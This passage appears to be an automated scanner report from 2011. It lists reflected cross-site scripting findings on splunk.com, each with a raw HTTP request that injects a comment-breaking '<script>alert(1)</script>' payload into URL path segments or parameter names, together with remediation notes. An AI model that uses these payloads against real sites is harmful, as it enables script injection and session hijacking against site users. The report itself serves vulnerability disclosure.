GET /viewc2db0--><script>alert(1)</script>5fa0ec96c9f/about-us/SP-CAAAAH8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:14 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:14 GMT; path=/ ETag: 253c2d09a4647113aa3e17c02474d0491296944294 Last-Modified: Sat, 05 Feb 2011 22:18:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9a0d4--><script>alert(1)</script>fe1ada0d8d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/about-us9a0d4--><script>alert(1)</script>fe1ada0d8d7/SP-CAAAAH8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload e5119--><script>alert(1)</script>8a69136f1cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/about-us/SP-CAAAAH8e5119--><script>alert(1)</script>8a69136f1cc HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.514. http://www.splunk.com/view/about-us/SP-CAAAAH8 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/about-us/SP-CAAAAH8
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ed8ae--><script>alert(1)</script>025e905c8f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/about-us/SP-CAAAAH8?ed8ae--><script>alert(1)</script>025e905c8f5=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54966
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6cf3e--><script>alert(1)</script>974aee27b52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view6cf3e--><script>alert(1)</script>974aee27b52/application-management-solutions/SP-CAAADSC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:44 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:44 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:44 GMT; path=/ ETag: 3b62969d966c7371419a601bcdfcf1331296944204 Last-Modified: Sat, 05 Feb 2011 22:16:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18463
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload d7f52--><script>alert(1)</script>77c3173cae0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/application-management-solutionsd7f52--><script>alert(1)</script>77c3173cae0/SP-CAAADSC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:14 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:14 GMT; path=/ ETag: 084d3cca0270f7d30f7bb04a60af58bf1296944235 Last-Modified: Sat, 05 Feb 2011 22:17:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18463
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload c325c--><script>alert(1)</script>14d03973bc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/application-management-solutions/SP-CAAADSCc325c--><script>alert(1)</script>14d03973bc1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.518. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/application-management-solutions/SP-CAAADSC
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b26a3--><script>alert(1)</script>13848164faa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/application-management-solutions/SP-CAAADSC?b26a3--><script>alert(1)</script>13848164faa=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 5697bc07fa3f5f88321b637974dcedfb1296944153 Last-Modified: Sat, 05 Feb 2011 22:15:53 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload fffc3--><script>alert(1)</script>b23d9f63288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewfffc3--><script>alert(1)</script>b23d9f63288/awards/SP-CAAADTE HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ ETag: 49c9355ec9fcf9b18292d767854accbb1296944314 Last-Modified: Sat, 05 Feb 2011 22:18:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload a9e0c--><script>alert(1)</script>f4ed59a9ce8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/awardsa9e0c--><script>alert(1)</script>f4ed59a9ce8/SP-CAAADTE HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3af7c--><script>alert(1)</script>f2932ecd793 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/awards/SP-CAAADTE3af7c--><script>alert(1)</script>f2932ecd793 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.522. http://www.splunk.com/view/awards/SP-CAAADTE [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/awards/SP-CAAADTE
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e1d30--><script>alert(1)</script>106c367054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/awards/SP-CAAADTE?e1d30--><script>alert(1)</script>106c367054=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:41 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35213
